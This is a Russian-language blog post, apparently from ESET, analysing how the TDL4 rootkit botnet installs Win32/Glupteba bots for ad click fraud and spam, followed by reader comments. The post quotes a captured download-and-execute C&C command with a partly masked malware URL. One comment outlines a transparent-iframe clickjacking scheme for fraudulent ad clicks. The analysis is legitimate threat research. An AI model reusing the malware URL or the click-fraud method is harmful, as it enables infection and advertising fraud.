Ботнет TDL4 сдаётся в аренду?

    Не так давно нами была замечена интересная особенность в некоторых новых сэмплах руткита TDL4 (Win32/Olmarik.AOV). Если кто не в курсе, данному руткиту удаётся удерживать звание самой технологичной массовой вредоносной программы вот уже на протяжении нескольких лет. Это первый полноценный руткит для x64, которому удалось в обход проверки цифровой подписи и PatchGuard пробраться в ядро на 64-битных системах.

    Дело в том, что после своей успешной установки, некоторые экземпляры этого руткита устанавливают в систему троянцев из семейства Win32/Glupteba. Это наводит на мысли о том, что ресурсы данного ботнета начали сдавать в аренду. Так же интересно, что нет дальнейшего взаимодействия между ботами Win32/Glupteba и TDL4.

    Итак, сразу после успешной установки и идентификации бот TDL4 получает следующую команду из С&C:

    task_id = 2|10||h**p://wheelcars.ru/no.exe

    Интерпретировать которую можно следующим образом:

    task_id = [command_id] [encryption_key] [URL]

    В нашем случае набор параметров совпадает с командой «DownloadAndExecute», потому что ключ шифрования равен нулю, а идентификатор команды равен 2 и затем следует количество попыток ее выполнение, равное десяти.

    После установки в систему Win32/Glupteba получает задание уже из своего C&C и начинает его выполнение.

    image

    Чаще всего бот получает два типа заданий: первый – это скликивание контекстной рекламы из рекламной сети «Бегун», а второе — рассылка спама. Давайте по подробнее рассмотрим, что же делает этот бот.

    В первом случае происходит посещение большого количества сформированных специальном образом веб-страниц, наполнение которых провоцирует появление определенного типа контекстных объявлений. Причем все веб-страницы, с которых происходит скликивание, расположены на серверах провайдера Masterhost.

    image

    Если посмотреть на статистику сетевых обращений скликивающего бота, то она выглядит следующим образом:

    image

    Сам ботнет TDL4, как и его предшественник, так же активно монетизируется через «черные» методы продвижения веб-сайтов и подмену результатов поиска в популярных поисковых системах.
    ESET NOD32
    Company
    Ads
    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More

    Comments 19

      0
      интересно почему используется всего два сервера rax.ru для накликивания, а не все сразу?
        +6
        Ссылку на вредонос в текстовке я бы спрятал хотя бы под hxxp. А то очень скоро Хабр начнут индексировать как распространителя инфекции.
          0
          Интересно, а почему Google AdSense не накликивает, там же дороже?
            +2
            Может там больше проверок на скликивание рекламы, из-за чего могут банить аккаунты вебмастеров, на рекламе зарабатывающих.
              +4
              Да кикие там проверки.
              На jquery скиливатель пишется за 1 минуту. Тут даже бота не надо.
              делаем копию фрейма с рекламой гугля, ставим ему прозрачность и гоняем фрейм за мышкой, так чтоб ссылка была под курсором. Если пользователь не нажал за 10 секунд на какую нить ссылку — убираем фрейм. Так же скликиватель запускается раз в 5-10 пользователей. Всё — профит. Только ищи трафика и зарабатывай
                0
                Ого. Я думал, там такое детектят(хоть бы по возросшему числу кликов, или еще по каким параметрам), и банят.
                Хотя, может и рост кликов можно трактовать как вполне нормальное явление при изменении дизайна/наполнения сайта.
                  0
                  В адсенсе проверяют вручную когда на вывод попадает заявка, превышающая какой-то лимит (американы поговаривают о 1500$, но это надо проверять).
                  Ну и еще в ряде случаев.
                  А если еще и код GA стоит, то могут статистику посмотреть ну и дальше понятно становится все.
                  +1
                  А потом вы подаете заявку на вывод средств, ваши статсы проверяют и благополучно банят вас, а скликанные средства (вместе с честно заработанными) вернут счастливым рекламодателям, получившим бесплатный траффик благодаря вашим шалостям.
                +11
                Авторы просто ещё не прочитали соседнюю статью про вывод денег с AdSense на банковский счёт.
                  0
                  Гугл и так славится баном аккуантов по поводу и без.
                  Так что лучше не давать им лишнюю причину для бана.
                  0
                  На самом деле просто потому что не так это и просто. Скликивать просто урлы отданый XML фидом в фоне не получится. А открывать браузер и эмулировать нажатие не так и просто :)
                    +2
                    Курите node.js + zombie :)
                      0
                      Так и представил себе бота выкачивающего десятимегабайтную nodejs для того чтобы скликивать рекламу…

                      Наверняка там уже имеющийся в любой винде движок ИЕ используется.
                      +1
                      В Винде эмулировать браузер и действия в нем не просто, а очень просто.
                        0
                        Только для скликвания нужны свои площадки нормальные апрувленные гуглом и ратио 1 к 1 врядли будет похоже на правду
                      +2
                      Удивило присутствие tns-counter.ru — похоже, это адрес счетчика TNS Gallup Media — авторитетного аудитора сайтов. На основе его отчетов продается дорогая реклама. Интересно, фильтруют ли они подобные «посещения» и «клики»…
                        0
                        Я думаю раз крутят — значит не фильтруют.
                        0
                        >> Не так давно нами была замечена интересная особенность в некоторых новых сэмплах руткита TDL4.
                        Не так давно нами была рекогнисцирована аттрактивная фича в селекции брэнд-нью сэмплов руткита TDL4.
                        Может быть все-таки «в некоторых образцах»?
                          0
                          аминь!

                        Only users with full accounts can post comments. Log in, please.